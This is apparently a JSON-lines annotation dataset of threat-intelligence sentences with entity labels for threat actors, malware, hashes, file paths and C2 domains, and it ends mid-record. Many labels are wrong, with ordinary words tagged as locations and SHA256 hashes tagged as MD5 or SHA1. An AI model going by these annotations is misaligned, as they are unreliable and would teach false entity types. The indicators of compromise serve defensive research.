{"id":551,"text":"The victims can find the threat actor\u2019s user name through specific group chat software or follow a chat group link in the ransom note. Ransom payment operations are complicated and highly automated processes.","entities":[],"relations":[],"Comments":[]} {"id":13496,"text":"One of the most prolific cybermercenaries is Void Balaur, a Russian-speaking threat actor group that has launched attacks against different sectors and industries all over the world.","entities":[{"id":51564,"label":"threat-actor","start_offset":45,"end_offset":56}],"relations":[],"Comments":[]} {"id":13122,"text":"For others, digital transformation had been a priority for much longer, but the events of the past two years added a new sense of urgency.","entities":[],"relations":[],"Comments":[]} {"id":3857,"text":"In this scenario, accevent.exe is the primary executable, which is usually legitimate.","entities":[{"id":49716,"label":"FILEPATH","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} {"id":3513,"text":"ShellManage - Creates a shell.","entities":[],"relations":[],"Comments":[]} {"id":2584,"text":" Unit 42 has helped organizations respond to multiple Lapsus$ attacks.","entities":[{"id":47769,"label":"identity","start_offset":1,"end_offset":8},{"id":7797,"label":"threat-actor","start_offset":54,"end_offset":61}],"relations":[],"Comments":[]} {"id":1368,"text":"More information about these protections can be found within the Mitigation Actions section of the briefing.","entities":[],"relations":[],"Comments":[]} {"id":3726,"text":"Continuous vigilance against threat groups is an important aspect of keeping up with \u2014 if not being one step ahead of \u2014 threats.","entities":[],"relations":[],"Comments":[]} {"id":2302,"text":"In this blog we analyze the technical details of the exploit chain and share IOCs to help teams defend against similar style attacks.","entities":[],"relations":[],"Comments":[]} {"id":2280,"text":"This past year, TAG has been collaborating with Google\u2019s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":45441,"label":"identity","start_offset":16,"end_offset":19},{"id":45438,"label":"malware","start_offset":99,"end_offset":107},{"id":45439,"label":"identity","start_offset":48,"end_offset":87},{"id":45440,"label":"SOFTWARE","start_offset":127,"end_offset":142}],"relations":[],"Comments":[]} {"id":3198,"text":"The legitimate known application is downloaded and executed.","entities":[],"relations":[],"Comments":[]} {"id":13684,"text":"jQuery method is used to post the target\u2019s credentials to hosting site The phishing pages record passwords inputted by site visitors.","entities":[{"id":51752,"label":"attack-pattern","start_offset":79,"end_offset":87}],"relations":[],"Comments":[]} {"id":1296,"text":" If the file does not exist, it will make the following GET request: The filename and name parameters are statically set in the above request.","entities":[],"relations":[],"Comments":[]} {"id":185,"text":"Beginning on Feb. 15, a series of distributed denial of service (DDoS) attacks commenced.","entities":[{"id":45851,"label":"TIME","start_offset":13,"end_offset":20},{"id":45852,"label":"attack-pattern","start_offset":34,"end_offset":70}],"relations":[],"Comments":[]} {"id":2900,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 15)]","entities":[],"relations":[],"Comments":[]} {"id":9678,"text":"Figure 16.","entities":[],"relations":[],"Comments":[]} {"id":7586,"text":"The latter is a configuration file that handles files to install.","entities":[],"relations":[],"Comments":[]} {"id":4232,"text":"At the end of last year, a C&C from the same threat actor was not only accessible from any IP address, but it was possible to browse the server directory tree without authentication.","entities":[],"relations":[],"Comments":[]} {"id":14037,"text":"These paths leak information about the third-party libraries\u2019 installed paths.","entities":[],"relations":[],"Comments":[]} {"id":4077,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":23,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":3518,"text":"The trigger format is: %system32\/rundll32.exe .","entities":[{"id":49303,"label":"FILEPATH","start_offset":23,"end_offset":45}],"relations":[],"Comments":[]} {"id":9530,"text":"Gh0st RAT","entities":[{"id":29237,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":14112,"text":"Other public references also used the compiled binary time of samples attributed to APT37.","entities":[{"id":48180,"label":"threat-actor","start_offset":84,"end_offset":89}],"relations":[],"Comments":[]} {"id":4542,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} {"id":4818,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50750,"label":"identity","start_offset":35,"end_offset":38},{"id":50751,"label":"identity","start_offset":57,"end_offset":75},{"id":50752,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50753,"label":"threat-actor","start_offset":88,"end_offset":96},{"id":50749,"label":"identity","start_offset":16,"end_offset":23},{"id":50754,"label":"vulnerability","start_offset":132,"end_offset":153}],"relations":[{"id":1006,"from_id":50753,"to_id":50754,"type":"exploits"},{"id":1007,"from_id":50752,"to_id":50754,"type":"exploits"}],"Comments":[]} {"id":1470,"text":"For security reasons we are not posting the names of any of these apps.","entities":[],"relations":[],"Comments":[]} {"id":2737,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":9054,"text":"RATANKBA host manipulation console RATANKBA\u2019s controllers use the \u201cNimo Software HTTP Retriever 1.0\u201d user-agent string for its communication.","entities":[{"id":27961,"label":"malware","start_offset":0,"end_offset":8},{"id":27962,"label":"location","start_offset":9,"end_offset":13},{"id":27963,"label":"malware","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} {"id":234,"text":" We monitored a list of 50 legitimate Ukraine-related domains (e.g., popular news and donation websites) and keywords (e.g., Ukraine, refugee) as targets for cybersquatting.","entities":[{"id":45781,"label":"location","start_offset":125,"end_offset":132},{"id":45934,"label":"location","start_offset":38,"end_offset":45},{"id":44651,"label":"attack-pattern","start_offset":158,"end_offset":172}],"relations":[{"id":137,"from_id":44651,"to_id":45781,"type":"targets"}],"Comments":[]} {"id":4474,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50270,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} {"id":5706,"text":" Figure 2. Fake installation pop-up The third attack vector used by Earth Lusca is the exploitation of vulnerabilities that exist in the public-facing applications \u2014 such as Microsoft Exchange ProxyShell and Oracle GlassFish \u2014 of its targets.","entities":[{"id":17601,"label":"location","start_offset":33,"end_offset":36},{"id":17603,"label":"tools","start_offset":61,"end_offset":67},{"id":17604,"label":"threat-actor","start_offset":76,"end_offset":87},{"id":17605,"label":"location","start_offset":145,"end_offset":151},{"id":17607,"label":"location","start_offset":192,"end_offset":200},{"id":17609,"label":"location","start_offset":212,"end_offset":215}],"relations":[],"Comments":[]} {"id":5148,"text":"I need a loaf of bread.","entities":[],"relations":[],"Comments":[]} {"id":3367,"text":"Python.BIOPASS.A","entities":[{"id":48985,"label":"malware","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} {"id":5360,"text":"The content of \/proc\/mtd for an Asus RT-AC68U device is as follows: Figure 7.","entities":[{"id":51364,"label":"FILEPATH","start_offset":15,"end_offset":24}],"relations":[],"Comments":[]} {"id":10303,"text":"Troj.Win32.TRX.XXPE50FFF039 50b000a7d61885591ba4ec9df1a0a223dbceb1ac2facafcef3d65c8cbbd64d46 email.exe","entities":[{"id":31452,"label":"SHA2","start_offset":29,"end_offset":93}],"relations":[],"Comments":[]} {"id":3578,"text":"The watermarking technique is implemented through the module attributes of the assembly.","entities":[],"relations":[],"Comments":[]} {"id":5065,"text":"Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.","entities":[],"relations":[],"Comments":[]} {"id":11128,"text":"For example in 2017, our Security Reliability Engineering team measured a record-breaking UDP amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and 9394), which remains the largest bandwidth attack of which we are aware.","entities":[{"id":34002,"label":"attack-pattern","start_offset":94,"end_offset":107},{"id":34005,"label":"location","start_offset":163,"end_offset":167},{"id":34007,"label":"location","start_offset":176,"end_offset":179},{"id":34008,"label":"location","start_offset":242,"end_offset":245}],"relations":[],"Comments":[]} {"id":11504,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":35193,"label":"attack-pattern","start_offset":25,"end_offset":33},{"id":35195,"label":"location","start_offset":131,"end_offset":134},{"id":35197,"label":"attack-pattern","start_offset":202,"end_offset":210}],"relations":[],"Comments":[]} {"id":14375,"text":"One messy reality is that enterprises don\u2019t manage all their endpoints.","entities":[],"relations":[],"Comments":[]} {"id":13713,"text":"Indicators of compromise (IOCs) Threat actor-managed C&C URLs: https:\/\/highstreetmuch[.]xyz\/hug\/gate[.]php https:\/\/takeusall[.]online\/benzz\/gate[.]PHP MITRE ATT&CK\u00ae Matrix Tags Cloud | APT & Targeted Attacks | Research | Phishing | Articles, News, Reports","entities":[{"id":51760,"label":"URL","start_offset":64,"end_offset":107},{"id":51761,"label":"URL","start_offset":108,"end_offset":151}],"relations":[],"Comments":[]} {"id":1821,"text":"We noted that it can disable a number of antivirus products, previously identified by Aon\u2019s researchers.","entities":[{"id":45143,"label":"identity","start_offset":86,"end_offset":103}],"relations":[],"Comments":[]} {"id":11724,"text":"Trojan.W97M.SIDEWINDER.A AB7C1967BF1FEFDFFDE93626B78EB30994655AB02F59E0ADB0935E3E599A953F RTF file Trojan.W97M.SIDEWINDER.A 2548A819E4C597BA5958D2D18BAA544452948E5B00271570192CCD79ABE88E8D 1.a JS file Trojan.JS.SIDEWINDER.A Downloader.","entities":[{"id":36129,"label":"SHA2","start_offset":29,"end_offset":93},{"id":36130,"label":"SHA2","start_offset":134,"end_offset":198}],"relations":[],"Comments":[]} {"id":9375,"text":" Figure 7. gooogle[.]press registration info","entities":[],"relations":[],"Comments":[]} {"id":5468,"text":"However, we construe them to be different groups, possibly within the same community, with different objectives and modi operandi.","entities":[],"relations":[],"Comments":[]} {"id":1011,"text":"Figure 4:","entities":[],"relations":[],"Comments":[]} {"id":6567,"text":"A rough translation of this message is as follows: \u201cFxxk, when I am released, the server is offline, I can\u2019t find the machine, the domain is expired, it is so bad.","entities":[],"relations":[],"Comments":[]} {"id":4496,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50298,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} {"id":376,"text":"Palo Alto Networks strongly advises organizations to patch immediately.","entities":[{"id":46073,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":5344,"text":"Finally, a variable containg the next time a packet should be sent is updated and all of the parameters are sent to the modules again.","entities":[],"relations":[],"Comments":[]} {"id":3305,"text":"If the value of the \u201ctype\u201d argument is \u201cChrome\u201d, it will use the AES secret key or DPAPI (for Chrome versions before 80) to decrypt the cookie file.","entities":[{"id":48388,"label":"SOFTWARE","start_offset":94,"end_offset":100}],"relations":[],"Comments":[]} {"id":1070,"text":" The particular vulnerability in question affects an Android feature known as \u201cToast.\u201d \u201cToast\u201d is a type of notification window that \u201cpops\u201d (like toast) on the screen.","entities":[{"id":46555,"label":"SOFTWARE","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} {"id":5541,"text":"In a separate attack, 962 online stores were hit in just 24 hours.","entities":[],"relations":[],"Comments":[]} {"id":13051,"text":"In this blog, Trend Micro shares security recommendations for organizations to ensure stable security practices in a cloud-first world.","entities":[],"relations":[],"Comments":[]} {"id":2974,"text":"For most, it\u2019s something they set up once and forget about.","entities":[],"relations":[],"Comments":[]} {"id":13154,"text":"We found the group was focused on stealing defense-, ocean-, and ship-related documents from target networks, which led us to believe that Tropic Trooper\u2019s main purpose is to exfiltrate confidential information or intelligence.","entities":[{"id":48938,"label":"threat-actor","start_offset":139,"end_offset":152}],"relations":[],"Comments":[]} {"id":4301,"text":"Trend Micro Solutions Patchwork uses email as an entry point, which is why securing the email gateway is important.","entities":[{"id":50095,"label":"identity","start_offset":0,"end_offset":11},{"id":50096,"label":"threat-actor","start_offset":22,"end_offset":31}],"relations":[],"Comments":[]} {"id":3830,"text":"If Koadic finds that the system is conducive to the attacker\u2019s interests, it downloads a base64-encrypted version of the ANEL malware from the Command-and-Control (C&C) server and executes it. Encrypted ANEL is decrypted using the \u201ccertutil -docode\u201d command.","entities":[{"id":11615,"label":"malware","start_offset":121,"end_offset":125},{"id":11618,"label":"malware","start_offset":204,"end_offset":208},{"id":49688,"label":"malware","start_offset":3,"end_offset":9}],"relations":[{"id":859,"from_id":49688,"to_id":11615,"type":"downloads"}],"Comments":[]} {"id":928,"text":"While ransomware is a large problem for users, it\u2019s important to realize that not all malware families are created equal.","entities":[],"relations":[],"Comments":[]} {"id":1229,"text":"This separation of functions may be intended to avoid detection by security products.","entities":[],"relations":[],"Comments":[]} {"id":10152,"text":"In the week of the 2017 presidential elections in Iran, Pawn Storm set up a phishing site targeting chmail.ir webmail users.","entities":[{"id":30971,"label":"attack-pattern","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} {"id":4703,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50590,"label":"identity","start_offset":4,"end_offset":25},{"id":50591,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} {"id":2062,"text":"A further account, l4cky-control, was also discovered.","entities":[{"id":47154,"label":"identity","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} {"id":10068,"text":"We also noticed the presence of an APK file hosted in one of the servers, suggesting that if the cybercriminals decide to go further than just infecting servers, they may decide to attack Android-based devices.","entities":[{"id":30709,"label":"identity","start_offset":138,"end_offset":142},{"id":30710,"label":"location","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} {"id":8660,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":10557,"text":"We\u2019ve also seen attackers try to trick people into downloading malware by impersonating health organizations: Generally, we\u2019re not seeing an overall rise in phishing attacks by government-backed groups; this is just a change in tactics.","entities":[{"id":32188,"label":"location","start_offset":141,"end_offset":148},{"id":32189,"label":"attack-pattern","start_offset":157,"end_offset":165},{"id":32190,"label":"identity","start_offset":211,"end_offset":215}],"relations":[],"Comments":[]} {"id":1600,"text":"Based on the reviews, the application does not function very well as a remote, but in reality it doesn\u2019t contain remote control capability.","entities":[],"relations":[],"Comments":[]} {"id":9728,"text":" Enterprises can benefit from Trend Micro\u2019s Smart Protection Suites with XGen\u2122 security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint. Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f Tags Malware | APT & Targeted Attacks | Endpoints | Research | Network","entities":[{"id":29662,"label":"location","start_offset":13,"end_offset":16},{"id":29666,"label":"location","start_offset":79,"end_offset":87},{"id":29667,"label":"location","start_offset":108,"end_offset":116},{"id":29668,"label":"location","start_offset":157,"end_offset":167},{"id":29669,"label":"location","start_offset":192,"end_offset":200},{"id":29670,"label":"location","start_offset":231,"end_offset":234},{"id":29671,"label":"SHA2","start_offset":414,"end_offset":478},{"id":29672,"label":"tools","start_offset":488,"end_offset":504},{"id":29673,"label":"SHA1","start_offset":507,"end_offset":571},{"id":29674,"label":"tools","start_offset":582,"end_offset":598},{"id":29675,"label":"SHA1","start_offset":601,"end_offset":665},{"id":29676,"label":"location","start_offset":693,"end_offset":696}],"relations":[],"Comments":[]} {"id":8823,"text":"In the threat actor toolkit, different types of attacks are used for different purposes: Phishing campaigns can be used like a scalpel\u2014targeting specific groups or individuals with personalized lures that are more likely to trick them into taking action (like clicking on a malware link), while DDoS attacks are more like a hatchet\u2014disrupting or blocking a site or a service entirely.","entities":[{"id":27325,"label":"location","start_offset":56,"end_offset":59},{"id":27326,"label":"attack-pattern","start_offset":89,"end_offset":97},{"id":27327,"label":"location","start_offset":108,"end_offset":111},{"id":27328,"label":"location","start_offset":205,"end_offset":208},{"id":27329,"label":"location","start_offset":214,"end_offset":220},{"id":27330,"label":"location","start_offset":230,"end_offset":234},{"id":27331,"label":"location","start_offset":247,"end_offset":253},{"id":27332,"label":"location","start_offset":308,"end_offset":311}],"relations":[],"Comments":[]} {"id":11497,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[],"relations":[],"Comments":[]} {"id":9407,"text":"Collection Data from Local System T1533 Used to collect files from the device, including documents, photos, and media files","entities":[{"id":28956,"label":"attack-pattern","start_offset":11,"end_offset":33},{"id":28957,"label":"location","start_offset":108,"end_offset":111},{"id":28958,"label":"location","start_offset":113,"end_offset":118}],"relations":[],"Comments":[]} {"id":2365,"text":"For those interested in following our in-the-wild work, we will soon publish details surrounding another, unrelated campaign we discovered using two Chrome 0-days (CVE-2021-37973 and CVE-2021-37976).","entities":[{"id":47418,"label":"vulnerability","start_offset":183,"end_offset":197},{"id":47419,"label":"SOFTWARE","start_offset":149,"end_offset":155},{"id":47417,"label":"vulnerability","start_offset":164,"end_offset":178}],"relations":[{"id":319,"from_id":47419,"to_id":47417,"type":"has"},{"id":320,"from_id":47419,"to_id":47418,"type":"has"}],"Comments":[]} {"id":1718,"text":"These many C2 mechanisms make Dyre much more difficult to fully take down than a simple single (or small group) of C2s.","entities":[{"id":46893,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} {"id":316,"text":"If your administrators and help desk are the only ones who need RDP access to your systems, disable RDP for the rest of your users.","entities":[{"id":46013,"label":"SOFTWARE","start_offset":100,"end_offset":103},{"id":46012,"label":"SOFTWARE","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} {"id":1510,"text":"This is an ELF file and there are various encrypted portions within it.","entities":[],"relations":[],"Comments":[]} {"id":9795,"text":"Indicators of Compromise SHA256 Type Detection Name 41ee0ab77b474b0c84a1c25591029533f058e4454d9f83ba30159cc6309c65d1","entities":[{"id":29845,"label":"location","start_offset":33,"end_offset":37},{"id":29846,"label":"SHA2","start_offset":53,"end_offset":117}],"relations":[],"Comments":[]} {"id":9583,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} {"id":13590,"text":"Note that the PHP code below is obfuscated.","entities":[],"relations":[],"Comments":[]} {"id":1646,"text":"Many of the users who downloaded the tool may not be using one of the targeted Spanish or Australian networks.","entities":[],"relations":[],"Comments":[]} {"id":510,"text":"This demonstrates the diversity of ransomware and emphasizes how difficult it is to expand ransomware detection coverage with static profiling.","entities":[],"relations":[],"Comments":[]} {"id":6803,"text":"If, however, these lines do not pass through this IF statement, an error would occur.","entities":[],"relations":[],"Comments":[]} {"id":3826,"text":"Variable}.registry.HKCU Set HKEY_CURRENT_USER {Variable}.registry.HKLM Set HKEY_LOCAL_MACHINE {Variable}.registry.STRING Set String Value {Variable}.registry.BINARY Set Binary Value {Variable}.registry.DWORD Set DWORD Value {Variable}.registry.QWORD","entities":[],"relations":[],"Comments":[]} {"id":14071,"text":"Figure 9 shows that SLUB used \u201cWindows-RT-KB-2937636.dll,\u201d while Freenki used \u201cWindows-KB275122-x86.exe.\u201d Figure 9 Naming convention for persistence.","entities":[{"id":47392,"label":"FILEPATH","start_offset":79,"end_offset":103},{"id":47389,"label":"FILEPATH","start_offset":31,"end_offset":56},{"id":47395,"label":"malware","start_offset":65,"end_offset":73},{"id":43549,"label":"malware","start_offset":20,"end_offset":24}],"relations":[{"id":316,"from_id":43549,"to_id":47389,"type":"uses"},{"id":317,"from_id":47395,"to_id":47392,"type":"uses"}],"Comments":[]} {"id":7502,"text":"The configuration portion of the PowerShell script","entities":[{"id":23343,"label":"attack-pattern","start_offset":33,"end_offset":43}],"relations":[],"Comments":[]} {"id":9306,"text":"Credit card CVN number cc_first_name ff First name of cardholder cc_last_name gg Last name of cardholder bill_to_phone hh Phone number for billing bill_to_country ii","entities":[],"relations":[],"Comments":[]} {"id":8109,"text":" Figure 4. Two-stage payload deployment Figure 5. Code showing how the dropper invokes extra DEX code To deploy the payload app callCam on the device without the user\u2019s awareness","entities":[{"id":25125,"label":"malware","start_offset":129,"end_offset":136}],"relations":[],"Comments":[]} {"id":13101,"text":"That resulted in our collaboration to develop secure network guidelines for industrial robots using ROS.","entities":[],"relations":[],"Comments":[]} {"id":3376,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10222,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":4089,"text":"Furthermore, when Lilith RAT is terminated, it will try to clean itself to prevent being found by investigators.","entities":[{"id":49923,"label":"malware","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} {"id":11313,"text":"Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten\u2019s objectives.","entities":[{"id":34577,"label":"location","start_offset":5,"end_offset":9},{"id":34579,"label":"threat-actor","start_offset":135,"end_offset":150}],"relations":[],"Comments":[]} {"id":3801,"text":"It also abuses three legitimate MS Office functions:","entities":[{"id":49673,"label":"SOFTWARE","start_offset":32,"end_offset":41}],"relations":[],"Comments":[]} {"id":12088,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[],"relations":[],"Comments":[]} {"id":14087,"text":"Even when the threat actor was not using the \u201cJSON\u201d format, the commands embedded in the various samples show a surprising amount of similarities.","entities":[],"relations":[],"Comments":[]} {"id":11264,"text":"Collect files Collects the specified file from an endpoint during an investigation Submit a file for sandbox analysis Submits a file to the Trend Micro Vision One sandbox for automated analysis Retrieve sandbox analysis report Retrieves the analysis report, IOCs, or artifacts available after automated analysis Quarantine email message","entities":[],"relations":[],"Comments":[]} {"id":7118,"text":"We provided a detailed analysis of this new HyperBro version in our research.","entities":[{"id":22273,"label":"malware","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} {"id":1741,"text":"Attackers send emails that appear to be from a person or company that you trust.","entities":[],"relations":[],"Comments":[]} {"id":8270,"text":"The payload was still njRAT.","entities":[{"id":25528,"label":"malware","start_offset":22,"end_offset":27}],"relations":[],"Comments":[]} {"id":6525,"text":"\u0645\u06a9\u062a\u0628\u0629 \u0625\u0644\u06a9\u062a\u0631\u0648\u0646\u06cc\u0629.pdf 70cab18770795ea23e15851fa49be03314dc081fc44cdf76e8f0c9b889515c1b Trojan.","entities":[{"id":20233,"label":"SHA1","start_offset":20,"end_offset":84}],"relations":[],"Comments":[]} {"id":3866,"text":" Figure 15. Koadic\u2019s communication traffic Medium- to long-term mitigation","entities":[{"id":49726,"label":"malware","start_offset":12,"end_offset":18}],"relations":[],"Comments":[]} {"id":727,"text":"The open-source OMI package is designed to provide a portable infrastructure backbone for web-based management tools, such as diagnostic monitoring, log analytic services and automation functionality within UNIX and Linux systems.","entities":[{"id":46299,"label":"SOFTWARE","start_offset":207,"end_offset":211},{"id":46301,"label":"SOFTWARE","start_offset":16,"end_offset":27},{"id":46300,"label":"SOFTWARE","start_offset":216,"end_offset":221}],"relations":[],"Comments":[]} {"id":4732,"text":"TAG also recently released information on a segment of attackers we call \u201chack-for-hire\u201d that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50640,"label":"attack-pattern","start_offset":74,"end_offset":87},{"id":50641,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50639,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":3229,"text":"The third scheduled task \u2014is called \u201cbig.txt\u201d\u2014 is responsible for implementing the BIOPASS RAT malware.","entities":[{"id":48350,"label":"FILEPATH","start_offset":37,"end_offset":44},{"id":9841,"label":"attack-pattern","start_offset":10,"end_offset":24},{"id":9842,"label":"malware","start_offset":83,"end_offset":94}],"relations":[],"Comments":[]} {"id":3258,"text":"Encoded \u201cjoin\u201d event sent to the C&C server Figure 19.","entities":[],"relations":[],"Comments":[]} {"id":6220,"text":"The email exfiltration flow with WebSocket backdoor Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":9097,"text":"Lurk compromised systems by exploiting web browser vulnerabilities via drive-by download attacks.","entities":[{"id":28092,"label":"malware","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} {"id":14010,"text":"When determining attribution, the most interesting leads are the ones that can deduce information about the malware author\u2019s working environment.","entities":[],"relations":[],"Comments":[]} {"id":12,"text":"If you re-test these hashes again from last week you can see an average of 49\/57 engines that detect last week\u2019s threat \u2013 but that\u2019s too little, too late for anyone who already lost data.","entities":[],"relations":[],"Comments":[]} {"id":2018,"text":"There are also no magic bytes within the packed payload, unlike UPX-packed binaries, which contain the magic bytes UPX!.","entities":[{"id":47116,"label":"tools","start_offset":64,"end_offset":67}],"relations":[],"Comments":[]} {"id":9800,"text":"Given their targets, we have named this campaign \u201cOperation ENDTRADE,\u201d and identified some of the findings in our research \u201cOperation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data\u201d.","entities":[{"id":29868,"label":"location","start_offset":0,"end_offset":5},{"id":29869,"label":"location","start_offset":40,"end_offset":48},{"id":29870,"label":"location","start_offset":71,"end_offset":74},{"id":29871,"label":"threat-actor","start_offset":144,"end_offset":148},{"id":29872,"label":"location","start_offset":198,"end_offset":201}],"relations":[],"Comments":[]} {"id":2188,"text":"By doing this, they were able to target organizations that relied on the distributor\u2019s security camera solution and infect their systems with malware.","entities":[],"relations":[],"Comments":[]} {"id":2181,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":5260,"text":"The apps mainly used Middle East-based news and sociopolitical themes as social engineering hooks and abused social media to further proliferate.","entities":[{"id":51300,"label":"attack-pattern","start_offset":73,"end_offset":91},{"id":51301,"label":"attack-pattern","start_offset":102,"end_offset":121}],"relations":[],"Comments":[]} {"id":13834,"text":"In the end, it returns the modified table.","entities":[],"relations":[],"Comments":[]} {"id":3855,"text":"It also downloads the following: Accevent.exe <-> Microsoft Accessible Event Watcher 7.2.0.0 event.dll <-> the loader of ssssss.ddd, (Detected as TROJ_ANELLDR) ssssss.ddd (lena_http.bin) <-> encrypted BKDR_ANEL (Detected as BKDR_ANELENC) ","entities":[{"id":49708,"label":"FILEPATH","start_offset":161,"end_offset":171},{"id":49711,"label":"malware","start_offset":225,"end_offset":237},{"id":49705,"label":"FILEPATH","start_offset":34,"end_offset":46},{"id":49706,"label":"FILEPATH","start_offset":94,"end_offset":103},{"id":49707,"label":"FILEPATH","start_offset":122,"end_offset":132},{"id":49709,"label":"FILEPATH","start_offset":173,"end_offset":186},{"id":49710,"label":"malware","start_offset":202,"end_offset":211},{"id":49712,"label":"malware","start_offset":147,"end_offset":159},{"id":49713,"label":"SOFTWARE","start_offset":51,"end_offset":93}],"relations":[],"Comments":[]} {"id":12283,"text":"Host IOCs Registry Keys HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverConfig HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update File Paths C:\\Windows\\System32\\Nwsapagent.sys C:\\Windows\\System32\\helpsvc.sys C:\\ProgramData\\USOShared\\uso.bin C:\\ProgramData\\VMware\\vmnat-update.bin C:\\ProgramData\\VirtualBox\\update.bin","entities":[{"id":38092,"label":"location","start_offset":0,"end_offset":4},{"id":38093,"label":"REGISTRYKEY","start_offset":24,"end_offset":83},{"id":38094,"label":"REGISTRYKEY","start_offset":84,"end_offset":143},{"id":38095,"label":"REGISTRYKEY","start_offset":144,"end_offset":198}],"relations":[],"Comments":[]} {"id":10222,"text":"The RATs were also sent to a wider net of targets including various industries around the world.","entities":[{"id":31229,"label":"malware","start_offset":35,"end_offset":38},{"id":31230,"label":"location","start_offset":90,"end_offset":95}],"relations":[],"Comments":[]} {"id":10767,"text":"It provides a comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect threats like REDBALDKNIGHT\u2019s attacks even without any engine or pattern update.","entities":[{"id":32911,"label":"location","start_offset":95,"end_offset":98},{"id":32912,"label":"location","start_offset":164,"end_offset":167},{"id":32913,"label":"threat-actor","start_offset":260,"end_offset":273}],"relations":[],"Comments":[]} {"id":4393,"text":"In the version tested, the C2 was unobfuscated and stored as a hardcoded string.","entities":[],"relations":[],"Comments":[]} {"id":4120,"text":"Opens command shell 0x5007 Unknown 0x5009 Closes command shell 0x500A","entities":[],"relations":[],"Comments":[]} {"id":13935,"text":"Now they are digging deeper into their victims\u2019 networks and looking for new ways to monetize their activities.","entities":[],"relations":[],"Comments":[]} {"id":10021,"text":"\u2014 TROJ_SIDELOADR.A 279cf1773903b7a5de63897d55268aa967a87f915a07924c574e42c9ed12de30 (sharphound.exe)","entities":[{"id":30594,"label":"MD5","start_offset":19,"end_offset":83}],"relations":[],"Comments":[]} {"id":2461,"text":" Table 2. Top 15 source IPs triggering the Spring Core Remote Code Execution Vulnerability signature.","entities":[{"id":47532,"label":"vulnerability","start_offset":43,"end_offset":90}],"relations":[],"Comments":[]} {"id":2770,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2483,"text":"Both Netlab 360 and Trend Micro also observed Mirai activity related to the SpringShell 